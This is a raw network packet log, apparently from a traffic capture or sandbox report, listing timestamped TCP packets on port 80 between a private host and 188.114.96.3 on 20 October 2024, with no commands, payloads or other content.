                                                          Oct 20, 2024 18:18:46.166436911 CEST4998680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.491411924 CEST8049986188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:46.667558908 CEST4998680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.815176010 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.815222979 CEST4998680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.815494061 CEST4997580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.816978931 CEST4999280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.820323944 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:46.820395947 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.821347952 CEST8049986188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:46.821399927 CEST4998680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.821849108 CEST8049975188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:46.821958065 CEST4997580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.823048115 CEST8049992188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:46.823121071 CEST4999280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.823216915 CEST4999280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:46.828607082 CEST8049992188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:47.182265043 CEST4999280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:47.187360048 CEST8049992188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:47.187381983 CEST8049992188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:47.187398911 CEST8049992188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:47.616969109 CEST8049992188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:47.822668076 CEST4999280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:47.843867064 CEST8049992188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:47.932033062 CEST4999280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:47.961244106 CEST4999280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:47.961848974 CEST4999780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:47.966641903 CEST8049997188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:47.966716051 CEST4999780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:47.966804981 CEST4999780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:47.966806889 CEST8049992188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:47.966861010 CEST4999280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:47.971882105 CEST8049997188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:48.322748899 CEST4999780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:48.327764988 CEST8049997188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:48.327779055 CEST8049997188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:48.327786922 CEST8049997188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:48.769073009 CEST8049997188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:48.838264942 CEST4999780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.146791935 CEST8049997188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:49.338447094 CEST4999780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.459563971 CEST4999780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.460169077 CEST5000480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.461714983 CEST4983080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.464660883 CEST8049997188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:49.464709044 CEST4999780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.465001106 CEST8050004188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:49.465063095 CEST5000480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.465164900 CEST5000480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.469923973 CEST8050004188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:49.822726011 CEST5000480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.827642918 CEST8050004188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:49.827653885 CEST8050004188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:49.827662945 CEST8050004188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:49.902426004 CEST5000880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.907277107 CEST8050008188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:49.907329082 CEST5000880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.907429934 CEST5000880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:49.912178040 CEST8050008188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.257834911 CEST8050004188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.260162115 CEST5000880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:50.265013933 CEST8050008188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.265146971 CEST8050008188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.432005882 CEST5000480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:50.484092951 CEST8050004188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.607290983 CEST5001080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:50.612179041 CEST8050010188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.614159107 CEST5001080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:50.614252090 CEST5001080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:50.619035006 CEST8050010188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.635143042 CEST5000480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:50.708472967 CEST8050008188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.924787045 CEST8050008188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.925122023 CEST5000880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:50.963315010 CEST5001080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:50.968125105 CEST8050010188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.968146086 CEST8050010188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:50.968154907 CEST8050010188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:51.069937944 CEST8050008188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:51.135107040 CEST5000880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.389523029 CEST8050010188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.525716066 CEST5001080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.625449896 CEST8050010188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.747754097 CEST5000480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.747936010 CEST5000880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.748044014 CEST5001080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.749265909 CEST5002480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.753204107 CEST8050004188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.753262043 CEST5000480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.754018068 CEST8050008188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.754028082 CEST8050010188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.754087925 CEST5000880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.754102945 CEST5001080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.754252911 CEST8050024188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.754307985 CEST5002480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.754448891 CEST5002480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.759669065 CEST8050024188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.848881006 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.853909016 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.854119062 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.854254961 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.859446049 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.881371021 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.886209011 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:53.886651039 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.886749983 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:53.891992092 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.104036093 CEST5002480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:54.109155893 CEST8050024188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.214533091 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:54.219443083 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.219723940 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.219733953 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.245465994 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:54.250516891 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.524266958 CEST8050024188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.675694942 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.675707102 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:54.676049948 CEST5002480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:54.816557884 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:54.816600084 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.038105011 CEST8050024188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.038125992 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.038136005 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.038166046 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.038172960 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.038178921 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.038620949 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.044150114 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.046444893 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.116760015 CEST8050024188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.116861105 CEST5002480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.135066032 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.165786982 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.167330027 CEST5002880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.171101093 CEST8050025188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.171161890 CEST5002580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.172146082 CEST8050028188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.172199011 CEST5002880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.172306061 CEST5002880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.177059889 CEST8050028188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.208601952 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.208749056 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.213629007 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.213639975 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.213649035 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.525763035 CEST5002880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.530632973 CEST8050028188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.530772924 CEST8050028188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.530783892 CEST8050028188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.601439953 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.602957964 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.607938051 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.776715994 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.776868105 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:55.781894922 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.781904936 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.781934023 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:55.975980043 CEST8050028188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.135055065 CEST5002880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.165977955 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.166871071 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.171838999 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.198065042 CEST8050028188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.331744909 CEST5002880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.332376003 CEST5002980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.337022066 CEST8050028188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.337210894 CEST5002880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.337280035 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.337357044 CEST5002980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.337438107 CEST5002980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.342314005 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.343043089 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.343218088 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.349322081 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.349340916 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.681994915 CEST5002980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:56.687134981 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.687146902 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.687155962 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.728576899 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:56.808828115 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.127840042 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.340681076 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.342096090 CEST5002980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.365863085 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.466226101 CEST5002980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.578331947 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.578366041 CEST5002480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.578413963 CEST5002980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.579018116 CEST5003080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.582681894 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.583966970 CEST8050030188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.584208012 CEST5003080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.584322929 CEST5003080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.584338903 CEST8050027188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.584387064 CEST5002780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.584412098 CEST8050024188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.584558964 CEST5002480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.585315943 CEST8050029188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.585381031 CEST5002980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.589772940 CEST8050030188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.931993961 CEST5003080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:57.938488007 CEST8050030188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.938505888 CEST8050030188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:57.938643932 CEST8050030188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:58.350317955 CEST8050030188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:58.525643110 CEST5003080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:58.734368086 CEST8050030188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:58.838131905 CEST5003080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:58.855704069 CEST5003180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:58.862169981 CEST8050031188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:58.862243891 CEST5003180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:58.862334013 CEST5003180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:58.868912935 CEST8050031188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:59.214013100 CEST5003180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:59.221214056 CEST8050031188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:59.221378088 CEST8050031188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:59.221389055 CEST8050031188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:59.647763014 CEST8050031188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:59.853756905 CEST5003180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:00.033348083 CEST8050031188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:00.167655945 CEST5003180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:00.245234013 CEST5003180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:00.245867014 CEST5003280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:00.252058029 CEST8050032188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:00.252130985 CEST5003280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:00.252286911 CEST5003280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:00.252950907 CEST8050031188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:00.253004074 CEST5003180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:00.259360075 CEST8050032188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:00.603921890 CEST5003280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:00.609539032 CEST8050032188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:00.609663963 CEST8050032188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:00.609673977 CEST8050032188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.747894049 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:01.752775908 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.752881050 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:01.753119946 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:01.758064032 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.764370918 CEST5003280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:01.812691927 CEST8050032188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.899959087 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:01.904938936 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.905011892 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:01.905075073 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:01.910126925 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.925038099 CEST8050032188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.925107002 CEST5003280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:02.104469061 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:02.109317064 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.109525919 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.261285067 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:02.266161919 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.266210079 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.266218901 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.562510014 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.666228056 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:02.930489063 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.147876024 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.152664900 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.152710915 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.152805090 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.196873903 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.318171024 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.318344116 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.323299885 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.338063002 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.665529013 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.788907051 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.788953066 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.801537037 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.802766085 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.808254004 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.808307886 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.808708906 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.808768034 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.808860064 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.814565897 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.118716955 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.119462967 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.125674963 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.166290998 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.171313047 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.171324015 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.171365976 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.296036005 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.296330929 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.301943064 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.301953077 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.301960945 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.591478109 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.650568962 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.688971043 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.759980917 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.960334063 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.150605917 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.379492044 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.379570007 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.385440111 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.385514975 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.385519981 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.385566950 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.387356997 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.392801046 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.392857075 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.395267963 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.401001930 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.744406939 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.749614954 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.749631882 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.749641895 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.171859026 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.259910107 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.400712967 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.463100910 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.529608011 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.534212112 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.751795053 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.751854897 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.753233910 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.753302097 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.753427029 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.758410931 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.103729010 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.108660936 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.108673096 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.108683109 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.567118883 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.619265079 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.803344011 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.853663921 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.939870119 CEST5003780192.168.2.5188.114.96.3
